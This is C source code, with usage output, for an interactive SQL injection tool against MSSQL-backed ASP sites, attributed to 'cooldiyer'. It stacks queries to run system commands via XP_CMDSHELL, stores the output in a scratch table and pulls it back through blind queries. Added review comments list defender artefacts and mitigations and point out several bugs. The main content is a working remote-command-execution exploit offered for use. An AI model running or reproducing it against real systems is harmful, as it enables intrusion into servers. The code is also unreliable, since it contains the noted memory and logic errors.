Sql注入SA权限CMD终结者+C源码
#include <windows.h>
#include <winsock2.h>
#include <wininet.h>
#include <stdlib.h>
#pragma comment(lib, "wininet.lib")
/* Globals shared between main() and ExecCommand(): the target URL prefix,
 * the quoting prefix selected by the "type" argument, and the matching
 * suffix appended to the boolean-blind query (see main()). They point at
 * argv[1] or at string literals and are never freed. */
char *injurl,*type,*end;
/* Fetch one URL over WinINet and hand back the response bytes.
 *
 * The session is opened with the User-Agent "SqlCMD" (a literal that will
 * appear verbatim in web-server logs) and every request bypasses the cache
 * (INTERNET_FLAG_RELOAD). A single InternetReadFile() of at most 8 KiB is
 * performed; larger responses are truncated and no loop is attempted.
 *
 * NOTE(review): the function returns a pointer to `buffer`, an automatic
 * array that goes out of scope on return, so the caller reads a dangling
 * stack pointer (undefined behaviour). None of the three handles / the read
 * result are checked for failure, and `buffer` is never NUL-terminated at
 * dwBytesRead, so strstr() on the result may scan past the received data. */
char *GetResult(char *url)
{
char buffer[1024*8];
DWORD dwBytesRead=0;
HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
InternetCloseHandle(hUrlFile);
InternetCloseHandle(hNet);
return buffer; /* dangling: `buffer` lives on this frame's stack */
}
/* Drive one command through the injection point and print its output.
 *
 * Flow as written:
 *  1. One stacked-query request creates a scratch table [SIC_Tmp], fills it
 *     from MASTER..XP_CMDSHELL, and appends a sentinel row '[g_over]'.
 *  2. A loop then fetches row n (n = 1, 2, ...) with a boolean-blind query
 *     whose text is wrapped in '[CoolDiyer]' markers so it can be located
 *     in the HTML response with strstr().
 *  3. When the sentinel row is reached the scratch table is dropped.
 *
 * Defender-relevant artefacts that this code leaves behind: a table named
 * SIC_Tmp in the target database, the marker strings '[CoolDiyer]' and
 * '[g_over]' and the literal XP_CMDSHELL / CREATE TABLE / DROP TABLE
 * fragments in request URLs, and the "SqlCMD" User-Agent from GetResult().
 * Disabling xp_cmdshell and denying the web application's login the
 * sysadmin role removes the capability this routine depends on.
 *
 * NOTE(review): the function is declared `char *` but every exit is a bare
 * `return;`; `p1` is used by strncpy() without being checked for NULL; and
 * in the "filter" loop `buff=='&'` compares the array (a pointer) with a
 * character and `result[j]=buff` stores a pointer into a char, so the
 * HTML-entity unescaping cannot work as intended. `response` is the
 * dangling pointer returned by GetResult(). All of this is left as-is. */
char *ExecCommand(char *cmd)
{
char url[1024],buff[1024],result[1024],*response,*p,*p1;
int n=1,i,j;
memset(url,0,sizeof(url));
/* Step 1: stacked queries create the scratch table and populate it. wsprintf()
 * caps output at 1024 characters, so a long `cmd` is silently truncated. */
wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL '%s';insert into [SIC_Tmp] values ('[g_over]')--",injurl,type,cmd);
response=GetResult(url);
/* Step 2: pull rows back one at a time, ordered by [id]. */
while(1){
memset(buff,0,sizeof(buff));
memset(result,0,sizeof(result));
/* "%%2B" is a URL-encoded '+' (string concatenation); a NULL row is
 * rendered as two adjacent markers so the parse below sees an empty string. */
wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then '[CoolDiyer][CoolDiyer]' else '[CoolDiyer]'%%2BResultTxt%%2B'[CoolDiyer]' end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
response=GetResult(url);
/* 11 == strlen("[CoolDiyer]"); the text between the two markers is the row. */
if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");
else {
puts("Cann't Injection It");
return; /* NOTE(review): no value returned from a `char *` function */
}
strncpy(buff,p+11,p1-p-11); /* NOTE(review): p1 may be NULL here */
/* Step 3: sentinel row reached -> clean up the scratch table and stop. */
if (!strcmp(buff,"[g_over]")){
wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
GetResult(url);
return;
}
//filter
/* Intended to turn "&lt;", "&gt;" and "&quot;" back into <, > and ".
 * NOTE(review): `buff=='&'` and `result[j]=buff` use the array itself
 * rather than buff[i], so this loop does not do what the comment says. */
for(i=0,j=0;i<strlen(buff);i++,j++){
if(buff=='&' && buff[i+2]=='t' && buff[i+3]==';'){
if (buff[i+1]=='l')result[j]='<';
if (buff[i+1]=='g')result[j]='>';
i+=3;
}
else if(buff=='&' && buff[i+1]=='q' && buff[i+2]=='u' && buff[i+3]=='o' && buff[i+4]=='t' && buff[i+5]==';'){
result[j]='"';
i+=5;
}
else result[j]=buff;
}
puts(result);
memset(url,0,sizeof(url));
n++;
}
}
/* Entry point: print a banner, validate the two arguments, select the
 * quoting prefix/suffix for the injection point, then read commands from
 * stdin in a loop until "exit" is typed.
 *
 * argv[1] is the URL up to and including the injectable parameter value;
 * argv[2] selects how that value is quoted: 0 = numeric (no quotes),
 * 1 = single-quoted string, 2 = LIKE/search pattern ("%'"). An argv[2]
 * outside 0..2 leaves `type`/`end` NULL, which wsprintf() later dereferences.
 *
 * NOTE(review): `void main` and strcmpi() are MSVC-specific; every banner
 * string uses "/n" and "/t" (forward slash), which print literally rather
 * than as newline/tab; and gets() performs an unbounded read into `cmd`
 * (removed from C11, CERT STR31-C). Left as-is. */
void main(int argc,char **argv)
{
char cmd[1024];
printf("=[Sql Inj CMD]======================================================/n");
printf("/tSQL Injection Command Exploit Powered By CoolDiyer/n/n");
if(argc!=3){
printf("/tUsage: sqlcmd.exe <InjURL> <type>/n");
printf("/t/tType:/t0->Number 1->char 2->Search/n");
printf("/tExample:/n/t/tsqlcmd.exe http://localhost/index.asp?id=1 0/n");
printf("=05-12-22===========================================================/n");
return;
}
injurl=argv[1];
/* atoi() is re-evaluated for each case; a non-numeric argv[2] yields 0. */
if(atoi(argv[2])==0){
type="";
end="";
}
if(atoi(argv[2])==1){
type="'";
end=" and ''='";
}
if(atoi(argv[2])==2){
type="%'";
end=" and '%'='";
}
/* Interactive loop: each line is handed to ExecCommand() until "exit". */
while (1)
{
printf("Sql Inj CMD>");
gets(cmd); /* NOTE(review): unbounded read into a 1024-byte buffer */
if (!strcmpi(cmd,"exit"))return;
ExecCommand(cmd);
}
}
----------------------------------------------------------
Sql注入SA权限CMD终结者+C源码
=[Sql Inj CMD]======================================================
SQL Injection Command Exploit Powered By CoolDiyer
Usage: sqlcmd.exe <InjURL> <type>
Type: 0->Number 1->char 2->Search
Example:
sqlcmd.exe http://localhost/index.asp?id=1 0
by:cooldiyer